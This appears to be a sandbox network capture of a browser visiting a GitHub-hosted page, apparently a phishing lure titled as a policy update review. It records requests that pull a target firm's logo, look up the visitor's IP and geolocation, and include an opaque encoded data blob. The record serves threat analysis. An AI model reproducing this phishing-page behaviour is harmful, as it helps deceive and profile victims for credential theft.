                                                                                    2024-12-17 23:28:44 UTC11809INData Raw: 67 45 6d 48 77 51 64 42 31 35 7a 55 30 56 44 55 6b 56 55 53 30 55 45 55 77 59 43 42 67 59 63 53 30 30 63 57 6b 55 59 65 45 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 49 51 48 51 45 4d 42 55 73 59 42 41 59 59 42 77 77 4d 48 45 73 63 47 51 41 66 55 31 68 44 56 51 51 57 42 42 41 4e 53 51 63 50 45 77 73 66 54 46 35 7a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 41 41 41 41 48 68 63 58 55 30 4a 45 53 57 39 55 53 30 56 5a 55 30 56 44 55 68 68 2b 53 30 56 5a 55 78 68 70 65 45 56 55 53 30 56 57 58 45 55 6b 46 78 46 55 44 77 6f 55 45 67 77 4e 55 67 4d 47 42 41 68 5a 46 67 67 43 47 77 6c 2b 53 30 56 5a 55 77 4d 57 48 41 59 41 41 67 6f 58 55 77 49 47 42 69 45 62 42 67 51 51 48 53 4d 52 48 51 67 78 42 67 51 51 48 30 30 47 48 77 51 64 42 30 78 5a 43 47 39 44
                                                                                    Data Ascii: gEmHwQdB15zU0VDUkVUS0UEUwYCBgYcS00cWkUYeEVUS0VZU0VDUkVUSxIQHQEMBUsYBAYYBwwMHEscGQAfU1hDVQQWBBANSQcPEwsfTF5zU0VDUkVUS0VZU0VDAAAAHhcXU0JESW9US0VZU0VDUhh+S0VZUxhpeEVUS0VWXEUkFxFUDwoUEgwNUgMGBAhZFggCGwl+S0VZUwMWHAYAAgoXUwIGBiEbBgQQHSMRHQgxBgQQH00GHwQdB0xZCG9D


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.44975813.227.8.644438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:44 UTC577OUTGET /harrisassoc.com?size=400 HTTP/1.1
                                                                                    Host: logo.clearbit.com
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: */*
                                                                                    Origin: https://roadmap27.github.io
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Referer: https://roadmap27.github.io/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:45 UTC548INHTTP/1.1 200 OK
                                                                                    Content-Type: image/png
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    Cache-Control: public, max-age=2592000
                                                                                    Date: Tue, 17 Dec 2024 23:28:44 GMT
                                                                                    x-envoy-response-flags: -
                                                                                    Server: Clearbit
                                                                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                    x-content-type-options: nosniff
                                                                                    X-Cache: Miss from cloudfront
                                                                                    Via: 1.1 042ecc89a1780cbeac8044aa867f1880.cloudfront.net (CloudFront)
                                                                                    X-Amz-Cf-Pop: BAH53-C1
                                                                                    X-Amz-Cf-Id: zysACBHHOe6LW1tt8GzBbuqFh2zWjaohUeqJ3itXrTH3kBA6W1U8Mw==
                                                                                    2024-12-17 23:28:45 UTC15345INData Raw: 33 62 65 39 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 02 00 00 00 22 3a 39 c9 00 00 3b b0 49 44 41 54 78 9c ec bd 09 58 14 57 ba 37 5e d5 fb 42 37 dd 80 ec 28 20 ee 28 0a 88 46 d1 4c 8c 5b 48 34 2a a2 d7 24 2e d1 31 9a 3b 6a 06 93 68 f4 ba 8e 91 31 2e 59 d4 2c 7a 33 c6 68 c4 a8 88 1a 15 31 26 e2 2e a2 20 a0 02 b2 c8 da 2c cd d2 fb 56 d5 d5 f5 7f e0 75 ce ad 0f 4d ee f7 fd bf af 9e 79 66 ee f9 3d 79 3a 4d 77 f5 a9 73 4e fd ce 7b de f5 28 62 59 96 c0 c0 f8 7f 0d c1 3f ba 03 18 ff 9a c0 c4 c2 e0 05 98 58 18 bc 00 13 0b 83 17 60 62 61 f0 02 4c 2c 0c 5e 80 89 85 c1 0b 30 b1 30 78 01 26 16 06 2f c0 c4 c2 e0 05 98 58 18 bc 00 13 0b 83 17 60 62 61 f0 02 4c 2c 0c 5e 80 89 85 c1 0b 30 b1 30 78 01 26 16 06 2f c0 c4 c2 e0 05 98
                                                                                    Data Ascii: 3be9PNGIHDR":9;IDATxXW7^B7( (FL[H4*$.1;jh1.Y,z3h1&. ,VuMyf=y:MwsN{(bY?X`baL,^00x&/X`baL,^00x&/
                                                                                    2024-12-17 23:28:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.449761185.199.108.1534438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:45 UTC652OUTGET /favicon.ico HTTP/1.1
                                                                                    Host: roadmap27.github.io
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                    Sec-Fetch-Site: same-origin
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: image
                                                                                    Referer: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:45 UTC635INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    Content-Length: 9115
                                                                                    Server: GitHub.com
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    permissions-policy: interest-cohort=()
                                                                                    ETag: "6758a043-239b"
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
                                                                                    X-GitHub-Request-Id: 4A2F:1790F1:D4D041:E466A1:6762092D
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Date: Tue, 17 Dec 2024 23:28:45 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-nyc-kteb1890092-NYC
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1734478126.758548,VS0,VE11
                                                                                    Vary: Accept-Encoding
                                                                                    X-Fastly-Request-ID: 7eaf1ad869c53947c7a348f35e3017f756a8f719
                                                                                    2024-12-17 23:28:45 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 20 69 6d 67 2d 73 72 63 20 64 61 74 61 3a 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"> <title>S
                                                                                    2024-12-17 23:28:45 UTC1378INData Raw: 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 39 32 64 70 69 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 32 64 70 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 31 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 73 75
                                                                                    Data Ascii: ice-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { .logo-img-1x { display: none; } .logo-img-2x { display: inline-block; } } #su
                                                                                    2024-12-17 23:28:45 UTC1378INData Raw: 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 77 64 47 73 39 49 6b 46 6b 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62
                                                                                    Data Ascii: x4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvb
                                                                                    2024-12-17 23:28:45 UTC1378INData Raw: 45 39 46 4e 72 67 77 42 43 4c 69 72 4d 46 56 39 4f 6b 68 35 65 66 6c 46 68 38 50 52 35 6e 4b 35 6e 44 61 62 72 52 32 42 4e 4a 6c 4b 4f 30 54 33 35 2b 4c 69 34 6e 34 2b 2f 4a 2b 2f 4a 51 43 78 68 6d 75 35 68 33 75 4a 6f 58 4e 48 50 62 6d 57 5a 41 48 4d 73 68 57 42 38 6c 35 2f 69 70 71 61 6d 6d 61 41 66 30 7a 50 44 44 78 31 4f 4e 56 33 76 75 72 64 69 64 71 77 41 51 4c 2b 70 45 63 38 73 4c 63 41 65 31 43 43 76 51 33 59 48 78 49 57 38 50 6c 38 35 78 53 57 4e 43 31 68 41 44 44 49 76 30 72 49 45 2f 6f 34 4a 30 6b 33 6b 77 77 34 78 53 6c 77 49 68 63 71 33 45 46 46 4f 6d 37 4b 4e 2f 68 55 47 4f 51 6b 74 30 43 46 61 35 57 70 4e 4a 6c 4d 76 78 42 45 7a 2f 49 56 51 41 78 67 2f 5a 52 5a 6c 39 77 69 48 41 36 33 79 44 59 69 65 4d 37 44 6e 4c 50 35 43 69 41 47 73 43 37
                                                                                    Data Ascii: E9FNrgwBCLirMFV9Okh5eflFh8PR5nK5nDabrR2BNJlKO0T35+Li4n4+/J+/JQCxhmu5h3uJoXNHPbmWZAHMshWB8l5/ipqammaAf0zPDDx1ONV3vurdidqwAQL+pEc8sLcAe1CCvQ3YHxIW8Pl85xSWNC1hADDIv0rIE/o4J0k3kww4xSlwIhcq3EFFOm7KN/hUGOQkt0CFa5WpNJlMvxBEz/IVQAxg/ZRZl9wiHA63yDYieM7DnLP5CiAGsC7
                                                                                    2024-12-17 23:28:45 UTC1378INData Raw: 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68
                                                                                    Data Ascii: b2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3h
                                                                                    2024-12-17 23:28:45 UTC1378INData Raw: 74 34 32 66 2b 4d 70 30 79 55 54 56 51 62 64 57 73 41 48 56 73 69 6b 64 69 48 6b 48 61 50 78 63 51 58 51 75 66 58 67 55 42 67 4d 52 78 6d 65 39 55 30 41 41 78 66 48 34 76 46 76 6a 4d 37 65 46 36 55 6b 62 4a 53 35 71 6f 51 77 45 51 47 41 35 37 41 63 35 4a 6c 6c 46 79 55 56 5a 5a 35 63 6b 55 45 67 4d 56 78 73 4b 32 6a 6c 53 59 7a 49 2b 51 58 4a 73 69 79 6a 7a 4e 45 41 4a 79 4a 41 7a 62 2f 4b 51 61 34 31 6a 4a 4b 4c 38 70 4f 44 4d 51 69 54 45 41 79 6d 58 77 35 6e 38 2f 50 30 49 6a 44 33 62 68 37 52 67 6f 67 35 39 61 61 6e 78 69 49 52 54 56 76 56 2f 6f 6a 30 74 6e 48 63 61 2f 57 4d 72 56 77 4f 44 77 42 33 72 61 54 47 78 7a 6b 42 67 2f 67 6e 5a 56 61 70 46 56 36 32 57 79 32 6e 35 41 4f 37 30 48 4d 2f 35 77 62 4a 30 51 6e 58 79 51 53 61 56 50 44 49 75 4e 5a 7a
                                                                                    Data Ascii: t42f+Mp0yUTVQbdWsAHVsikdiHkHaPxcQXQufXgUBgMRxme9U0AAxfH4vFvjM7eF6UkbJS5qoQwEQGA57Ac5JllFyUVZZ5ckUEgMVxsK2jlSYzI+QXJsiyjzNEAJyJAzb/KQa41jJKL8pODMQiTEAymXw5n8/P0IjD3bh7Rgog59aanxiIRTVvV/oj0tnHca/WMrVwODwB3raTGxzkBg/gnZVapFV62Wy2n5AO70HM/5wbJ0QnXyQSaVPDIuNZz
                                                                                    2024-12-17 23:28:45 UTC847INData Raw: 36 73 64 34 32 39 54 55 4e 45 63 6d 55 64 63 2b 50 52 61 4c 48 63 76 6e 38 37 64 58 57 34 75 67 7a 64 73 61 47 78 75 66 4c 39 34 4e 46 76 39 7a 69 31 4a 37 47 56 62 68 6c 76 62 32 64 6e 61 4a 33 53 56 72 78 66 63 2b 6e 32 2b 4e 54 73 5a 37 2f 48 37 2f 4d 72 33 67 35 58 64 53 49 48 79 4a 53 48 31 50 5a 2b 37 66 54 6f 79 6c 32 2b 45 72 71 69 6c 67 5a 34 4e 61 4c 59 42 39 67 6f 56 47 61 48 6a 52 39 33 48 76 31 5a 72 55 34 58 44 73 46 54 32 30 6b 48 33 50 4f 62 7a 62 57 6b 30 43 67 47 31 6a 61 63 56 49 55 6e 41 51 62 39 46 2b 56 65 78 79 4c 4d 7a 6b 70 63 4c 76 30 49 4a 56 37 41 48 51 49 4f 43 41 55 59 48 78 37 76 35 71 67 53 63 6d 59 48 74 54 71 53 41 79 5a 4c 45 4a 54 4b 32 32 42 69 65 34 69 71 33 78 73 71 70 6d 34 53 41 66 39 48 71 39 61 32 44 6e 4a 34 75
                                                                                    Data Ascii: 6sd429TUNEcmUdc+PRaLHcvn87dXW4ugzdsaGxufL94NFv9zi1J7GVbhlvb2dnaJ3SVrxfc+n2+NTsZ7/H7/Mr3g5XdSIHyJSH1PZ+7fToyl2+ErqilgZ4NaLYB9goVGaHjR93Hv1ZrU4XDsFT20kH3PObzbWk0CgG1jacVIUnAQb9F+VexyLMzkpcLv0IJV7AHQIOCAUYHx7v5qgScmYHtTqSAyZLEJTK22Bie4iq3xsqpm4SAf9Hq9a2DnJ4u


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.44976235.190.80.14438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:45 UTC543OUTOPTIONS /report/v4?s=Fu4V4TG6pcEcLP8N1pZSWTSNKKsjlofmYQ89bvK44sfdvgwfr3K6U7BPoECUrMEUVlbA17LN8lODsZVj6SELNl0hC6%2FUE0AjCso%2FLmSysGWk%2FusC9hyJJQpDO13B8OwsI5zl4Gpd HTTP/1.1
                                                                                    Host: a.nel.cloudflare.com
                                                                                    Connection: keep-alive
                                                                                    Origin: https://cdnjs.cloudflare.com
                                                                                    Access-Control-Request-Method: POST
                                                                                    Access-Control-Request-Headers: content-type
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:46 UTC336INHTTP/1.1 200 OK
                                                                                    Content-Length: 0
                                                                                    access-control-max-age: 86400
                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                    access-control-allow-origin: *
                                                                                    access-control-allow-headers: content-length, content-type
                                                                                    date: Tue, 17 Dec 2024 23:28:45 GMT
                                                                                    Via: 1.1 google
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.449764104.26.12.2054438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:45 UTC349OUTGET /?format=json HTTP/1.1
                                                                                    Host: api.ipify.org
                                                                                    Connection: keep-alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept: */*
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:46 UTC430INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 23:28:46 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 21
                                                                                    Connection: close
                                                                                    Vary: Origin
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3ab0ff795243b2-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1607&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=927&delivery_rate=1787025&cwnd=238&unsent_bytes=0&cid=0aeb68aa919920d0&ts=459&x=0"
                                                                                    2024-12-17 23:28:46 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                    Data Ascii: {"ip":"8.46.123.189"}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.449763172.67.69.2264438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:45 UTC549OUTGET /json/ HTTP/1.1
                                                                                    Host: ipapi.co
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: */*
                                                                                    Origin: https://roadmap27.github.io
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Referer: https://roadmap27.github.io/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:46 UTC981INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 23:28:46 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 764
                                                                                    Connection: close
                                                                                    Allow: HEAD, POST, OPTIONS, OPTIONS, GET
                                                                                    X-Frame-Options: DENY
                                                                                    Vary: Host, origin
                                                                                    access-control-allow-origin: https://roadmap27.github.io
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Referrer-Policy: same-origin
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgi4q3sOdw%2FbEt%2BoF0Zv8IqKfzC1ZYLkUjIoohQy0yBBzZN0qziRBrWeoXCZVRkBFet29vFDAy8%2BJkH7k5vMRoL60G6vGEHa9YA0%2BXcP17A%2BWYTNLvPD04sg"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3ab1005c7c183d-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=5320&min_rtt=1519&rtt_var=8030&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2790&recv_bytes=1131&delivery_rate=1913499&cwnd=253&unsent_bytes=0&cid=3b47e8cc06839963&ts=872&x=0"
                                                                                    2024-12-17 23:28:46 UTC388INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75
                                                                                    Data Ascii: { "ip": "8.46.123.189", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "cou
                                                                                    2024-12-17 23:28:46 UTC376INData Raw: 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 36 39 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 65 22 3a 20 34 30 2e 37 37 38 2c 0a 20 20 20 20 22 6c 6f 6e 67 69 74 75 64 65 22 3a 20 2d 37 33 2e 39 38 38 34 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 20 20 22 75 74 63 5f 6f 66 66 73 65 74 22 3a 20 22 2d 30 35 30 30 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 20 22 2b 31 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 22 3a 20 22 55 53 44 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 44 6f 6c 6c 61 72 22 2c 0a 20 20 20 20 22 6c 61 6e 67 75 61 67 65 73 22 3a 20 22 65 6e 2d 55 53 2c 65 73 2d 55
                                                                                    Data Ascii: , "postal": "10069", "latitude": 40.778, "longitude": -73.9884, "timezone": "America/New_York", "utc_offset": "-0500", "country_calling_code": "+1", "currency": "USD", "currency_name": "Dollar", "languages": "en-US,es-U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.44976513.227.8.644438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:47 UTC365OUTGET /harrisassoc.com?size=400 HTTP/1.1
                                                                                    Host: logo.clearbit.com
                                                                                    Connection: keep-alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept: */*
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:47 UTC555INHTTP/1.1 200 OK
                                                                                    Content-Type: image/png
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    Cache-Control: public, max-age=2592000
                                                                                    Date: Tue, 17 Dec 2024 23:28:44 GMT
                                                                                    x-envoy-response-flags: -
                                                                                    Server: Clearbit
                                                                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                    x-content-type-options: nosniff
                                                                                    X-Cache: Hit from cloudfront
                                                                                    Via: 1.1 4bc06bdfac9dee58bb5e9f5217e5dbaa.cloudfront.net (CloudFront)
                                                                                    X-Amz-Cf-Pop: BAH53-C1
                                                                                    X-Amz-Cf-Id: a7j6aDdIPpgwEUFJ-iHvzIIlL6fQg-Qj1Ki5B2gSxSLy4hwQFq55Sg==
                                                                                    Age: 3
